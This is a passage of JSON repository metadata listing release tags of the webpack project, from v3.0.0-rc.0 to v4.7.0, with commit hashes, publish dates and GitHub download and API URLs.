ositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_u